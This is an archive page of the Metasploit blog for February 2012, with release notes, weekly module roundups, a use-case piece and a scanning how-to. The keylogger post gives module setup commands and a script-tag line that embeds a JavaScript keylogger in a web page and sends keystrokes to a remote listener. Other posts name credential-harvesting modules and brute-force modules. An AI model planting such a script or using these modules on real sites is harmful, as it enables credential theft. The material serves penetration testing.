Skip navigation
All Places > Metasploit > Blog > 2012 > February
2012

Since our last release in October, we've added 54 new exploits, 66 new auxiliary modules, 43 new post-exploitation modules, and 18 new payloads -- that clocks in at just about 1.5 new modules per day since version 4.1. Clearly, this kind of volume is way too much to detail in a single update blog post. Of course, you could just dive in and download the latest version to get started. In the meantime, here are the highlights for this latest release of Metasploit.

 

IPv6 Coverage

 

Metasploit 4.2 now ships with thirteen brand new payloads, all added to support opening command sessions and shells on IPv6 networks. In addition, Metasploit's existing arsenal of payloads has been updated to support IPv6 as well. The database back end now fully supports IPv6 addressing for discovered and compromised hosts. Rex, Metasploit's general purpose socket and protocol library, is now compatible with IPv6 networks. The ability to launch attacks over IPv6, even in otherwise IPv4 networks, is crucial in the modern penetration testing environment, so if you're not yet up to speed on auditing a client network's IPv6 exposure, be sure to catch HD Moore's free IPv6 security online training on March 28.

 

Virtualization as an Attack Vector

 

With this release comes a pile of new modules targeting VMware vSphere/ESX SOAP interface, as well as a pair of new brute force modules to audit password strength for both vmauthd and Virtual Web Services. Here's the quick list of the new virtual target hotness:

 

  • vmauthd_version : Discovers the version details for a vmauthd service
  • esx_fingerprint : Fingerprints (down to the build number) of a stand-alone ESX server
  • vmware_http_login : Attempts to brute force local VMware credentials via the Web Services interface
  • vmauthd_login : Attempts to brute force local VMware credentials via the vmauthd service
  • vmware_enum_users : Enumerates both local and domain VMware user accounts
  • vmware_enum_permissions : Enumerates locally-defined user and group permissions on a VMware instance
  • vmware_enum_sessions : Enumerates active VMware login sessions
  • vmware_enum_vms : Enumerates all local virtual machines on the local VMware instance
  • vmware_host_details : Discovers host hardware and software details of the VMware host machine
  • poweroff_vm : Powers off a virtual machine via the VMware Web Services interface
  • poweron_vm : Powers on a virtual machine via the VMware Web Services interface
  • tag_vm : Writes a user-defined "tag" to the VMware logs as proof of compromise
  • vmware_screenshot_stealer : Grabs screenshots of VMware guest operating systems as proof of compromise
  • terminate_esx_sessions : Disconnects a user from the ESX server

 

Virtual machine targets in a network often offer unique avenues of attack for penetration testers, and are sometimes overlooked by IT departments and security infrastructure groups alike. Rapid7's David Maloney, aka, TheLightCosine, wrote most of these modules. For a deep-dive into virtualization security, please join his webcast on March 21.

 

New Resource Scripts

 

Metasploit 4.2 now ships with fourteen new resource scripts, nearly all of which were provided by open source community contributors. These scripts demonstrate the power of Metasploit's extensible architecture, allowing programmatic Metasploit module usage through the powerful Ruby scripting language. By automating away penetration testing tasks common to most engagements, Metasploit expert users can free up valuable time for more interesting avenues of research and exploitation. Note that while these scripts are useful on their own, they're also great examples of using this entry point and really getting your hands dirty with Metasploit internals. Finally, most of these scripts were submitted by open source contributor m-1-k-3, while the Oracle-centric scripts come from nebulous.

 

The Ghost of Updates Past

 

Since January or so, we've been detailing the progress of Metasploit development here on the blog, so other big updates won't come as much of a surprise to regular readers. Metasploit 4.2 includes Chao-Mu's reload of Railgun, HD's SSH public key scanner and H.323 video conferencing scanner, Jon Cran's overhaul of MSF Labs, expanded 64-bit payload coverage, and bunches more.

 

Details and Availability

 

For detailed information on this release, check out Jcran's most excellent release notes. To start playing with the shiny new Metasploit 4.2, download your free copy now.

javascript_keylogger_metasploit.png

Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don't understand how their credentials get compromised. Password reuse on several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in their databases. An attacker only needs to insert some evil code, and allow it to do the work for them.

 

This is one of the many reasons how the Internet is a like a field of mines, where malicious code is around every turn. If an attacker can insert code on a website they don't need to crack any passwords. Keyloggers can be included on most websites with one line of code. The activity that ensues is pretty awesome from an attacker's perspective, they can sit back and watch credentials magically appear. It reminds me of the fisherman tales of fishes jumping into their boats.

 

In the information security field Metasploit is the ultimate, "I can show you better than I can tell you!" software. Security professionals need to be able to demonstrate exploitation techniques to users and management. I have seen Javascript Keyloggers out there in the wild, but couldn't find a scalable, easy to deploy version.

 

So I sat down a couple of weeks ago and wrote a Metasploit based Javascript keylogger from scratch. I have to give props to Wei, Tod, and HD for motivation and help with fine tuning the module.  Adding exploitation techniques to Metasploit solves any scalability and deploy-ability issues. James "@egyp7" Lee presented a talk at the last BSides Las Vegas, on why it makes sense to develop these types of tools using Metasploit. The reason is Metasploit has tons of code that you can reuse to build anything, almost like Lego blocks.

 

The Metasploit Javascript Keylogger sets up a HTTP/HTTPS listener which serves the Javascript keylogger code and captures the keystrokes over the network. I've include a demo page within the module for testing purposes. Just enter "set DEMO true" during module setup as you can see below to activate the demo page. To access the demo page, just append "/demo" to the URL provided.

 

Of course, the keylogger captures all keystrokes including tabs, carraige returns, and backspaces entered on the webpage once the Javascript HTML tag is in embeded on a webpage.

 

Step 1: Module setup:

 

msf > use auxiliary/server/capture/http_javascript_keylogger 
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options


Module options (auxiliary/server/capture/http_javascript_keylogger):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DEMO        true             yes       Creates HTML for demo purposes
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(http_javascript_keylogger) > run

[*] Using URL: http://0.0.0.0:8080/qZBRzd
[*]  Local IP: http://192.168.1.131:8080/qZBRzd
[*] Server started.

 

Step 2: Demo page URL

Screen Shot 2012-02-21 at 9.50.02 AM.png

Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with "/[whatever].js".

 

<script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js">

 

Screen Capture 1: Module setup and run

Screen Shot 2012-02-21 at 9.46.21 AM.png

Screen Capture 2: Demo page

Screen Shot 2012-02-21 at 10.00.24 AM.png

Screen Capture 3: Keystrokes captured and stored to loot

Screen Shot 2012-02-21 at 10.00.07 AM.png

As always hack responsibly. Let me know if you have any question in the comments.

 

If you haven't looked at Metasploit Community Edition, you should definitely give it a try.

 

You can also hit me on Twitter @threatagent.

This week, with RSA 2012 fast approaching and the final touches on Metasploit version 4.2 getting nailed down, we've been in a code freeze for core Metasploit functionality. However, that doesn't apply to the parade of modules, so here's what's in store for the next -- and quite likely last -- update for Metasploit 4.1.

 

Authentication Credential Gathering and Testing

 

Jon Hart (of Nexpose fame) has been on fire with new Metasploit contributions -- this week, he's come up with a trio of credential snarfing post modules. mount_cifs_creds picks up the saved credentials from a Linux machine's /etc/fstab file (used when auto-mounting SMB/CIFS file shares to Linux workstations); fetchmailrc_creds picks up stored e-mail credentials used by the popular Fetchmail utility; and netrc_creds, which pulls credentials from a user's local .netrc file (usually private FTP credentials).

 

Once you've snagged credentials with these and other modules, open source contributor m-1-k-3 has supplied a nifty new resource script, auto_cred_checker.rc. This script runs through all the credentials currently in the Metasploit database and validates them by loading up the appropriate service login auxiliary module and giving the creds a shot. Super cool.

 

New Modules and Scripts

 

As usual, we have a handful of other new modules and scripts this week.

 

  • adobe_flash_sps, by sinn3r, exploits CVE-2011-2140 in Adobe's Flash Player.
  • c6_messenger_downloaderactivex exploits CVE-2008-2551 for an ActiveX control in Icona's C6 Messenger, and was submitted by Juan Vazquez.
  • citrix_streamprocess_data_msg, exploits the Citrix Provision Services vulnerability described in ZDI-12-009, and was submitted by alino.
  • sunway_force_control_netdbsrv, exploits OSVDB-75798, a vulnerability in the SCADA human-machine interface (HMI) application Sunway Forcecontrol, and was provided by contributors Rinat Ziyayev and James Fitts.
  • m-1-k-3 also provided two new resource scripts, basic_discovery.rc used to automate port scanning), and multi_post.rc, which automates a bunch of common post-exploitation tasks.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

When we talk to Metasploit users, they usually use it for either penetration testing, password auditing or vulnerability validation, but few use it for more than one of these purposes. By leveraging your investment in Metasploit, you can triple-dip at the same price - no extra licenses needed.

 

Penetration Testing

 

With penetration testing, you can identify issues in your security infrastructure that could lead to a data breach. Weaknesses you can identify include exploitable vulnerabilities, weak or shared passwords, vulnerable web applications, and low security awareness among your staff. Typically, penetration tests are set up as projects, although companies are starting to adopt penetration testing as a program to:

 

  • Regularly assess the security of their infrastructure
  • Test the security of new applications and systems before roll-out
  • Re-test the security of systems after major changes

 

Password Auditing

 

Adding password auditing to your security program can really help you lower the risk of a data breach. By regularly scanning your network, Metasploit's brute forcing function can help you identify the following issues:

 

  • Weak passwords that lack length or complexity
  • Passwords contained in dictionaries
  • Passwords that are easily guessed based on information about the infrastructure
  • Vendor default passwords
  • Replaying cached credentials
  • Re-use of passwords across trust zones
  • Development test credentials in a production environment
  • Active accounts of previous employees

 

vuln verification.png

Vulnerability Validation

 

This is a lesser-known use case for Metasploit, but a very powerful one if used right. Vulnerability scanners can typically only detect if a vulnerable version of an application or operating system is installed on a system. However, not all vulnerabilities are exploitable, and only exploitable vulnerabilities can lead to a data breach. If you don't know which vulnerabilities put the company's data at risk, you have to fix all vulnerabilities. If you have ever read the long reports of vulnerability scanners, you know this is a daunting and audacious task. Most companies don't have the resouces to ever close this list out.

 

With Metasploit, you can validate whether a vulnerability is in fact exploitable. You should focus on remediating these vulnerabilities, and can safely ignore the vulnerabilities that cannot be exploited. After you have remediated an exploitable vulnerability, use Metasploit as your litmus test to see if it is now no longer exploitable. Metasploit can import the vulnerability scanning reports from all major vulnerability scanners, so you can leverage your existing infrastructure and investment.

 

While penetration testing and password auditing will increase the security of your infrastructure as a type of "security quality assurance", vulnerability validation is a tool that helps you reduce the workload of your security team and focus on issues that really matter.

 

If you're interested in testing out Metasploit Pro for either penetration testing or vulnerability validation, download a free trial now.

We've had a lot of people ask us how they can scan their own network to find out if they are vulnerable to the video conferencing issue described in

HD's blog post Board Room Spying for Fun and Profit and the various news coverage of the video conferencing story. Here's a quick how-to:

 

  1. Download a free trial of Metasploit Pro.
  2. Create a New Project and click on Scan on the Overview tab
    scan.png
  3. Click on Advanced Options
  4. Change Custom TCP source port to 1720
  5. Uncheck UDP service discovery for faster scanning
  6. Ensure that Scan H.323 video endpoints is checked
    settings.png
  7. To validate an identified service, connect with a H.323-capable client such as NetMeeting (Windows XP), Ekiga (cross-platform, but buggy), Mirial Softphone (commercial), or ClearSea In the Cloud (only able to reach internet-exposed devices). For internal systems, I still rely on NetMeeting in a XP virtual machine as the most reliable H.323 client, however, this lacks the Pan-Tilt-Zoom (PTZ) and keypad controls of a more advanced client like Mirial or ClearSea In the Cloud.

 

Get your free trial of Metasploit Pro now and start your scan!

PCAnywhere, Anywhere

 

The big news this week centered around Symantec's pcAnywhere. For starters, there's a new ZDI advisory for a buffer overflow in the username field. More notably, though, was the advice in a Symantec white paper which advises customers to "disable or remove Access Server and use remote sessions via secure VPN tunnels." So, while the Metasploit elves bang away at a proper buffer overflow module, HD Moore busted out a pair of pcAnywhere service scanner modules, pcanywhere_tcp and pcanywhere_udp, and the Nexpose team wrote up a how-to blog post on auditing your infrastructure for pcAnywhere services using Dynamic Asset Groups. It's important to keep in mind that PCAnywhere has a tendency to show up as rogue software (not installed or approved by IT), so it would behoove one to audit one's network regularly -- to get started, you can download Metasploit here.

 

New Payloads

 

This week we also have a smattering of new payloads. Payload updates tend to be less frequent than modules, but these guys are pretty much what proves that a vulnerability is, in fact, exploitable. For that reason, it's always notable when new techniques and platforms are added into the mix. Community contributor argp provides  osx/x64/exec, which allows for arbitrary command execution against Mac OSX 64-bit platforms. We also have three new payloads for PHP targets: php/bind_perl_ipv6 (by Samy and cazz), php/bind_php_ipv6 (by diaul and James "egyp7" Lee), and php/bind_tcp_ipv6 (also by egyp7).

 

New Modules

 

Of course, no update would be complete without the usual smattering of new modules:

 

  • vbseo_proc_deutf exploits BID-51647 against Crawlability's vbSEO plugin for vBulletin, submitted by EgiX
  • ektron_cms400net, an auxiliary module which tests default passwords against Ektron CMS400.NET services, submitted by Justin Cacak.
  • vmware_http_login, which targets VMWare Server, ESX, and ESXi for brute forcing, added by David "TheLightCosine" Maloney
  • ms12_004_midi targets the Window Media Player bug CVE-2012-0003 (aka, MS12-004), provided by Wei "sinn3r" Chen, and Juan Vazquez
  • hp_magentservice exploits CVE-2011-4789, a bug with HP Diagnostics Server's magnetservice.exe, submitted by hal
  • find_vmx and enum_vbox, two post modules which enumerate local VMWare and Virtual Box virtual machines, also by TheLightCosine.

 

As always, thanks to everyone out there in open source land for their efforts on these.

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Filter Blog

By date: By tag: